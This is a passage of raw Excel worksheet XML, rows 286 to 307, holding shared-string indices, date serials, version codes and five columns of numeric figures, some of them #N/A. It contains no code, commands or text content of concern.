      <c r="I286" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J286" s="1" t="s">
        <v>542</v>
      </c>
      <c r="K286" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L286" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M286" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N286" s="1"/>
      <c r="O286" s="1"/>
      <c r="P286" s="1"/>
      <c r="Q286" s="1" t="s">
        <v>3593</v>
      </c>
      <c r="R286" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S286" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T286" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U286" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V286" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W286" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="287" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A287" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B287" s="51">
        <v>44092.756072256947</v>
      </c>
      <c r="C287" s="1" t="s">
        <v>2875</v>
      </c>
      <c r="D287" s="43">
        <v>201</v>
      </c>
      <c r="E287" s="1" t="s">
        <v>2876</v>
      </c>
      <c r="F287" s="26">
        <v>201</v>
      </c>
      <c r="G287" s="1" t="s">
        <v>2877</v>
      </c>
      <c r="H287" s="1" t="s">
        <v>2878</v>
      </c>
      <c r="I287" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J287" s="1" t="s">
        <v>767</v>
      </c>
      <c r="K287" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L287" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M287" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N287" s="1" t="s">
        <v>522</v>
      </c>
      <c r="O287" s="1" t="s">
        <v>2879</v>
      </c>
      <c r="P287" s="1"/>
      <c r="Q287" s="1" t="s">
        <v>3594</v>
      </c>
      <c r="R287" s="83">
        <v>6910</v>
      </c>
      <c r="S287" s="83">
        <v>5909</v>
      </c>
      <c r="T287" s="83">
        <v>5276</v>
      </c>
      <c r="U287" s="83">
        <v>5279</v>
      </c>
      <c r="V287" s="83">
        <v>6540</v>
      </c>
      <c r="W287" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="288" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A288" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B288" s="51">
        <v>44154.519527986115</v>
      </c>
      <c r="C288" s="1" t="s">
        <v>2886</v>
      </c>
      <c r="D288" s="26">
        <v>101</v>
      </c>
      <c r="E288" s="1" t="s">
        <v>2887</v>
      </c>
      <c r="F288" s="26">
        <v>101</v>
      </c>
      <c r="G288" s="1" t="s">
        <v>2888</v>
      </c>
      <c r="H288" s="1" t="s">
        <v>2889</v>
      </c>
      <c r="I288" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J288" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K288" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L288" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M288" s="1" t="s">
        <v>2703</v>
      </c>
      <c r="N288" s="1"/>
      <c r="O288" s="1"/>
      <c r="P288" s="1"/>
      <c r="Q288" s="1" t="s">
        <v>3595</v>
      </c>
      <c r="R288" s="83">
        <v>730176</v>
      </c>
      <c r="S288" s="83">
        <v>665617</v>
      </c>
      <c r="T288" s="83">
        <v>635359</v>
      </c>
      <c r="U288" s="83">
        <v>567594</v>
      </c>
      <c r="V288" s="83">
        <v>705142</v>
      </c>
      <c r="W288" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="289" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A289" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B289" s="51">
        <v>44624.74904328704</v>
      </c>
      <c r="C289" s="1" t="s">
        <v>2886</v>
      </c>
      <c r="D289" s="43">
        <v>200</v>
      </c>
      <c r="E289" s="1" t="s">
        <v>2887</v>
      </c>
      <c r="F289" s="43">
        <v>200</v>
      </c>
      <c r="G289" s="1" t="s">
        <v>2888</v>
      </c>
      <c r="H289" s="1" t="s">
        <v>2889</v>
      </c>
      <c r="I289" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J289" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K289" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L289" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M289" s="1" t="s">
        <v>2703</v>
      </c>
      <c r="N289" s="1"/>
      <c r="O289" s="1"/>
      <c r="P289" s="1"/>
      <c r="Q289" s="1" t="s">
        <v>3596</v>
      </c>
      <c r="R289" s="83">
        <v>730176</v>
      </c>
      <c r="S289" s="83">
        <v>665617</v>
      </c>
      <c r="T289" s="83">
        <v>635359</v>
      </c>
      <c r="U289" s="83">
        <v>567594</v>
      </c>
      <c r="V289" s="83">
        <v>705142</v>
      </c>
      <c r="W289" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="290" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A290" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B290" s="51">
        <v>44154.519527974539</v>
      </c>
      <c r="C290" s="1" t="s">
        <v>2886</v>
      </c>
      <c r="D290" s="26">
        <v>101</v>
      </c>
      <c r="E290" s="1" t="s">
        <v>2892</v>
      </c>
      <c r="F290" s="26">
        <v>102</v>
      </c>
      <c r="G290" s="1" t="s">
        <v>2893</v>
      </c>
      <c r="H290" s="1" t="s">
        <v>2894</v>
      </c>
      <c r="I290" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J290" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K290" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L290" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M290" s="1" t="s">
        <v>2703</v>
      </c>
      <c r="N290" s="1"/>
      <c r="O290" s="1"/>
      <c r="P290" s="1"/>
      <c r="Q290" s="1" t="s">
        <v>3595</v>
      </c>
      <c r="R290" s="83">
        <v>710848</v>
      </c>
      <c r="S290" s="83">
        <v>628700</v>
      </c>
      <c r="T290" s="83">
        <v>605696</v>
      </c>
      <c r="U290" s="83">
        <v>538410</v>
      </c>
      <c r="V290" s="83">
        <v>647424</v>
      </c>
      <c r="W290" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="291" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A291" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B291" s="51">
        <v>44624.749043263888</v>
      </c>
      <c r="C291" s="1" t="s">
        <v>2886</v>
      </c>
      <c r="D291" s="43">
        <v>200</v>
      </c>
      <c r="E291" s="1" t="s">
        <v>2892</v>
      </c>
      <c r="F291" s="43">
        <v>200</v>
      </c>
      <c r="G291" s="1" t="s">
        <v>2893</v>
      </c>
      <c r="H291" s="1" t="s">
        <v>2894</v>
      </c>
      <c r="I291" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J291" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K291" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L291" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M291" s="1" t="s">
        <v>2703</v>
      </c>
      <c r="N291" s="1"/>
      <c r="O291" s="1"/>
      <c r="P291" s="1"/>
      <c r="Q291" s="1" t="s">
        <v>3596</v>
      </c>
      <c r="R291" s="83">
        <v>710848</v>
      </c>
      <c r="S291" s="83">
        <v>628700</v>
      </c>
      <c r="T291" s="83">
        <v>605696</v>
      </c>
      <c r="U291" s="83">
        <v>538410</v>
      </c>
      <c r="V291" s="83">
        <v>647424</v>
      </c>
      <c r="W291" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="292" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A292" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B292" s="51">
        <v>44019.899358391202</v>
      </c>
      <c r="C292" s="1" t="s">
        <v>2927</v>
      </c>
      <c r="D292" s="43">
        <v>100</v>
      </c>
      <c r="E292" s="1" t="s">
        <v>2928</v>
      </c>
      <c r="F292" s="26">
        <v>100</v>
      </c>
      <c r="G292" s="1" t="s">
        <v>2929</v>
      </c>
      <c r="H292" s="1" t="s">
        <v>2930</v>
      </c>
      <c r="I292" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J292" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K292" s="1" t="s">
        <v>14</v>
      </c>
      <c r="L292" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M292" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N292" s="1" t="s">
        <v>1098</v>
      </c>
      <c r="O292" s="1" t="s">
        <v>2931</v>
      </c>
      <c r="P292" s="1"/>
      <c r="Q292" s="1" t="s">
        <v>3597</v>
      </c>
      <c r="R292" s="83">
        <v>85642</v>
      </c>
      <c r="S292" s="83">
        <v>105869</v>
      </c>
      <c r="T292" s="83">
        <v>87381</v>
      </c>
      <c r="U292" s="83">
        <v>61199</v>
      </c>
      <c r="V292" s="83">
        <v>53838</v>
      </c>
      <c r="W292" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="293" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A293" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B293" s="51">
        <v>44491.094653958331</v>
      </c>
      <c r="C293" s="1" t="s">
        <v>2938</v>
      </c>
      <c r="D293" s="43">
        <v>102</v>
      </c>
      <c r="E293" s="1" t="s">
        <v>2939</v>
      </c>
      <c r="F293" s="26">
        <v>102</v>
      </c>
      <c r="G293" s="1" t="s">
        <v>2940</v>
      </c>
      <c r="H293" s="1" t="s">
        <v>2941</v>
      </c>
      <c r="I293" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J293" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K293" s="1" t="s">
        <v>35</v>
      </c>
      <c r="L293" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M293" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N293" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O293" s="1"/>
      <c r="P293" s="1"/>
      <c r="Q293" s="1" t="s">
        <v>3598</v>
      </c>
      <c r="R293" s="83">
        <v>3620954</v>
      </c>
      <c r="S293" s="83">
        <v>3153679</v>
      </c>
      <c r="T293" s="83">
        <v>3111027</v>
      </c>
      <c r="U293" s="83">
        <v>2976609</v>
      </c>
      <c r="V293" s="83">
        <v>3103102</v>
      </c>
      <c r="W293" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="294" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A294" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B294" s="51">
        <v>44539.690664699076</v>
      </c>
      <c r="C294" s="1" t="s">
        <v>2943</v>
      </c>
      <c r="D294" s="26">
        <v>101</v>
      </c>
      <c r="E294" s="1" t="s">
        <v>2944</v>
      </c>
      <c r="F294" s="26">
        <v>101</v>
      </c>
      <c r="G294" s="1" t="s">
        <v>2945</v>
      </c>
      <c r="H294" s="1" t="s">
        <v>2946</v>
      </c>
      <c r="I294" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J294" s="1" t="s">
        <v>2947</v>
      </c>
      <c r="K294" s="74" t="s">
        <v>37</v>
      </c>
      <c r="L294" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M294" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N294" s="1"/>
      <c r="O294" s="1"/>
      <c r="P294" s="1"/>
      <c r="Q294" s="1" t="s">
        <v>3599</v>
      </c>
      <c r="R294" s="83">
        <v>9415030</v>
      </c>
      <c r="S294" s="83">
        <v>8773075</v>
      </c>
      <c r="T294" s="83">
        <v>8976006</v>
      </c>
      <c r="U294" s="83">
        <v>8720360</v>
      </c>
      <c r="V294" s="83">
        <v>10292915</v>
      </c>
      <c r="W294" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="295" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A295" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B295" s="51">
        <v>44596.495707361108</v>
      </c>
      <c r="C295" s="1" t="s">
        <v>2943</v>
      </c>
      <c r="D295" s="26">
        <v>201</v>
      </c>
      <c r="E295" t="s">
        <v>2944</v>
      </c>
      <c r="F295" s="26">
        <v>201</v>
      </c>
      <c r="G295" s="1" t="s">
        <v>2945</v>
      </c>
      <c r="H295" s="1" t="s">
        <v>2949</v>
      </c>
      <c r="I295" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J295" s="1" t="s">
        <v>2947</v>
      </c>
      <c r="K295" s="74" t="s">
        <v>37</v>
      </c>
      <c r="L295" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M295" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N295" s="1"/>
      <c r="O295" s="1"/>
      <c r="P295" s="1"/>
      <c r="Q295" s="1" t="s">
        <v>2950</v>
      </c>
      <c r="R295" s="83">
        <v>9415030</v>
      </c>
      <c r="S295" s="83">
        <v>8773075</v>
      </c>
      <c r="T295" s="83">
        <v>8976006</v>
      </c>
      <c r="U295" s="83">
        <v>8720360</v>
      </c>
      <c r="V295" s="83">
        <v>10292915</v>
      </c>
      <c r="W295" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="296" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A296" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B296" s="51">
        <v>44390.480803171296</v>
      </c>
      <c r="C296" s="1" t="s">
        <v>2951</v>
      </c>
      <c r="D296" s="43">
        <v>101</v>
      </c>
      <c r="E296" s="1" t="s">
        <v>2952</v>
      </c>
      <c r="F296" s="26">
        <v>101</v>
      </c>
      <c r="G296" s="1" t="s">
        <v>2953</v>
      </c>
      <c r="H296" s="1" t="s">
        <v>2954</v>
      </c>
      <c r="I296" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J296" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K296" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L296" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M296" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N296" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O296" s="1"/>
      <c r="P296" s="1"/>
      <c r="Q296" s="1" t="s">
        <v>3600</v>
      </c>
      <c r="R296" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S296" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T296" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U296" s="83">
        <v>1963</v>
      </c>
      <c r="V296" s="83">
        <v>21262</v>
      </c>
      <c r="W296" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="297" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A297" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B297" s="51">
        <v>44390.480803206017</v>
      </c>
      <c r="C297" s="1" t="s">
        <v>2951</v>
      </c>
      <c r="D297" s="43">
        <v>101</v>
      </c>
      <c r="E297" s="1" t="s">
        <v>2956</v>
      </c>
      <c r="F297" s="26">
        <v>101</v>
      </c>
      <c r="G297" s="1" t="s">
        <v>2957</v>
      </c>
      <c r="H297" s="1" t="s">
        <v>2958</v>
      </c>
      <c r="I297" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J297" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K297" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L297" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M297" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N297" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O297" s="1"/>
      <c r="P297" s="1"/>
      <c r="Q297" s="1" t="s">
        <v>3600</v>
      </c>
      <c r="R297" s="83">
        <v>198450</v>
      </c>
      <c r="S297" s="83">
        <v>218783</v>
      </c>
      <c r="T297" s="83">
        <v>196134</v>
      </c>
      <c r="U297" s="83">
        <v>216702</v>
      </c>
      <c r="V297" s="83">
        <v>233026</v>
      </c>
      <c r="W297" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="298" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A298" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B298" s="51">
        <v>44495.60851859954</v>
      </c>
      <c r="C298" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D298" s="43">
        <v>315</v>
      </c>
      <c r="E298" s="1" t="s">
        <v>2959</v>
      </c>
      <c r="F298" s="26">
        <v>103</v>
      </c>
      <c r="G298" s="1" t="s">
        <v>2960</v>
      </c>
      <c r="H298" s="1" t="s">
        <v>2961</v>
      </c>
      <c r="I298" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J298" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K298" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L298" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M298" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N298" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O298" s="1" t="s">
        <v>2962</v>
      </c>
      <c r="P298" s="1"/>
      <c r="Q298" s="1" t="s">
        <v>3601</v>
      </c>
      <c r="R298" s="83">
        <v>40128175</v>
      </c>
      <c r="S298" s="83">
        <v>35134289</v>
      </c>
      <c r="T298" s="83">
        <v>38911106</v>
      </c>
      <c r="U298" s="83">
        <v>38660405</v>
      </c>
      <c r="V298" s="83">
        <v>44806196</v>
      </c>
      <c r="W298" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="299" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A299" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B299" s="51">
        <v>44615.993121701387</v>
      </c>
      <c r="C299" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D299" s="43">
        <v>401</v>
      </c>
      <c r="E299" s="1" t="s">
        <v>2959</v>
      </c>
      <c r="F299" s="26">
        <v>201</v>
      </c>
      <c r="G299" s="1" t="s">
        <v>2960</v>
      </c>
      <c r="H299" s="1" t="s">
        <v>2961</v>
      </c>
      <c r="I299" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J299" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K299" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L299" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M299" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N299" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O299" s="1"/>
      <c r="P299" s="1"/>
      <c r="Q299" s="1" t="s">
        <v>3602</v>
      </c>
      <c r="R299" s="83">
        <v>40128175</v>
      </c>
      <c r="S299" s="83">
        <v>35134289</v>
      </c>
      <c r="T299" s="83">
        <v>38911106</v>
      </c>
      <c r="U299" s="83">
        <v>38660405</v>
      </c>
      <c r="V299" s="83">
        <v>44806196</v>
      </c>
      <c r="W299" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="300" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A300" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B300" s="51">
        <v>44495.608518530091</v>
      </c>
      <c r="C300" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D300" s="43">
        <v>315</v>
      </c>
      <c r="E300" s="1" t="s">
        <v>2966</v>
      </c>
      <c r="F300" s="26">
        <v>311</v>
      </c>
      <c r="G300" s="1" t="s">
        <v>2967</v>
      </c>
      <c r="H300" s="1" t="s">
        <v>2968</v>
      </c>
      <c r="I300" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J300" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K300" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L300" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M300" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N300" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O300" s="1" t="s">
        <v>2969</v>
      </c>
      <c r="P300" s="1" t="s">
        <v>250</v>
      </c>
      <c r="Q300" s="1" t="s">
        <v>3601</v>
      </c>
      <c r="R300" s="83">
        <v>100867</v>
      </c>
      <c r="S300" s="83">
        <v>142294</v>
      </c>
      <c r="T300" s="83">
        <v>130189</v>
      </c>
      <c r="U300" s="83">
        <v>262576</v>
      </c>
      <c r="V300" s="83">
        <v>806818</v>
      </c>
      <c r="W300" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="301" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A301" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B301" s="51">
        <v>44603.042708125002</v>
      </c>
      <c r="C301" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D301" s="43">
        <v>401</v>
      </c>
      <c r="E301" s="1" t="s">
        <v>2966</v>
      </c>
      <c r="F301" s="26">
        <v>401</v>
      </c>
      <c r="G301" s="1" t="s">
        <v>2967</v>
      </c>
      <c r="H301" s="1" t="s">
        <v>2968</v>
      </c>
      <c r="I301" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J301" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K301" s="3" t="s">
        <v>10</v>
      </c>
      <c r="L301" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M301" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N301" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O301" s="1"/>
      <c r="P301" s="1"/>
      <c r="Q301" s="1" t="s">
        <v>3602</v>
      </c>
      <c r="R301" s="83">
        <v>100867</v>
      </c>
      <c r="S301" s="83">
        <v>142294</v>
      </c>
      <c r="T301" s="83">
        <v>130189</v>
      </c>
      <c r="U301" s="83">
        <v>262576</v>
      </c>
      <c r="V301" s="83">
        <v>806818</v>
      </c>
      <c r="W301" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="302" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A302" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B302" s="51">
        <v>44495.608518553243</v>
      </c>
      <c r="C302" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D302" s="43">
        <v>315</v>
      </c>
      <c r="E302" s="1" t="s">
        <v>2970</v>
      </c>
      <c r="F302" s="26">
        <v>111</v>
      </c>
      <c r="G302" s="1" t="s">
        <v>2971</v>
      </c>
      <c r="H302" s="1" t="s">
        <v>2972</v>
      </c>
      <c r="I302" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J302" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K302" s="3" t="s">
        <v>10</v>
      </c>
      <c r="L302" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M302" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N302" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O302" s="1" t="s">
        <v>2973</v>
      </c>
      <c r="P302" s="1"/>
      <c r="Q302" s="1" t="s">
        <v>3601</v>
      </c>
      <c r="R302" s="83">
        <v>1777991</v>
      </c>
      <c r="S302" s="83">
        <v>1508679</v>
      </c>
      <c r="T302" s="83">
        <v>449661</v>
      </c>
      <c r="U302" s="83">
        <v>449064</v>
      </c>
      <c r="V302" s="83">
        <v>780572</v>
      </c>
      <c r="W302" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="303" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A303" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B303" s="51">
        <v>44385.978538495372</v>
      </c>
      <c r="C303" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D303" s="43">
        <v>401</v>
      </c>
      <c r="E303" s="1" t="s">
        <v>2970</v>
      </c>
      <c r="F303" s="26">
        <v>201</v>
      </c>
      <c r="G303" s="1" t="s">
        <v>2971</v>
      </c>
      <c r="H303" s="1" t="s">
        <v>2972</v>
      </c>
      <c r="I303" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J303" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K303" s="3" t="s">
        <v>10</v>
      </c>
      <c r="L303" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M303" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N303" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O303" s="1"/>
      <c r="P303" s="1"/>
      <c r="Q303" s="1" t="s">
        <v>3602</v>
      </c>
      <c r="R303" s="83">
        <v>1777991</v>
      </c>
      <c r="S303" s="83">
        <v>1508679</v>
      </c>
      <c r="T303" s="83">
        <v>449661</v>
      </c>
      <c r="U303" s="83">
        <v>449064</v>
      </c>
      <c r="V303" s="83">
        <v>780572</v>
      </c>
      <c r="W303" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="304" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A304" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B304" s="51">
        <v>44340.620269027779</v>
      </c>
      <c r="C304" s="1" t="s">
        <v>2982</v>
      </c>
      <c r="D304" s="43">
        <v>100</v>
      </c>
      <c r="E304" s="1" t="s">
        <v>2983</v>
      </c>
      <c r="F304" s="26">
        <v>100</v>
      </c>
      <c r="G304" s="1" t="s">
        <v>2984</v>
      </c>
      <c r="H304" s="1" t="s">
        <v>2985</v>
      </c>
      <c r="I304" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J304" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K304" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L304" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M304" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N304" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O304" s="1"/>
      <c r="P304" s="1"/>
      <c r="Q304" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R304" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S304" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T304" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U304" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V304" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W304" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="305" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A305" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B305" s="51">
        <v>44340.620269004627</v>
      </c>
      <c r="C305" s="1" t="s">
        <v>2982</v>
      </c>
      <c r="D305" s="43">
        <v>100</v>
      </c>
      <c r="E305" s="1" t="s">
        <v>2986</v>
      </c>
      <c r="F305" s="26">
        <v>100</v>
      </c>
      <c r="G305" s="1" t="s">
        <v>2987</v>
      </c>
      <c r="H305" s="1" t="s">
        <v>2988</v>
      </c>
      <c r="I305" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J305" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K305" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L305" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M305" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N305" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O305" s="1"/>
      <c r="P305" s="1"/>
      <c r="Q305" s="1" t="s">
        <v>161</v>
      </c>
      <c r="R305" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S305" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T305" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U305" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V305" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W305" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="306" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A306" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B306" s="51">
        <v>44474.417397951387</v>
      </c>
      <c r="C306" s="1" t="s">
        <v>2989</v>
      </c>
      <c r="D306" s="43">
        <v>100</v>
      </c>
      <c r="E306" s="1" t="s">
        <v>2990</v>
      </c>
      <c r="F306" s="26">
        <v>100</v>
      </c>
      <c r="G306" s="1" t="s">
        <v>2991</v>
      </c>
      <c r="H306" s="1" t="s">
        <v>2992</v>
      </c>
      <c r="I306" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J306" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K306" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L306" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M306" s="1" t="s">
        <v>270</v>
      </c>
      <c r="N306" s="1" t="s">
        <v>271</v>
      </c>
      <c r="O306" s="1"/>
      <c r="P306" s="1"/>
      <c r="Q306" s="1" t="s">
        <v>2993</v>
      </c>
      <c r="R306" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S306" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T306" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U306" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V306" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W306" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="307" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A307" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B307" s="51">
        <v>44474.417397928242</v>
      </c>
      <c r="C307" s="1" t="s">
        <v>2989</v>
      </c>
      <c r="D307" s="43">
        <v>100</v>
      </c>
      <c r="E307" s="1" t="s">
        <v>2994</v>
      </c>
      <c r="F307" s="26">
        <v>100</v>
      </c>
      <c r="G307" s="1" t="s">
        <v>2995</v>
      </c>
      <c r="H307" s="1" t="s">
        <v>2996</v>
      </c>
      <c r="I307" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J307" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K307" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L307" s="1" t="s">
        <v>77</v>
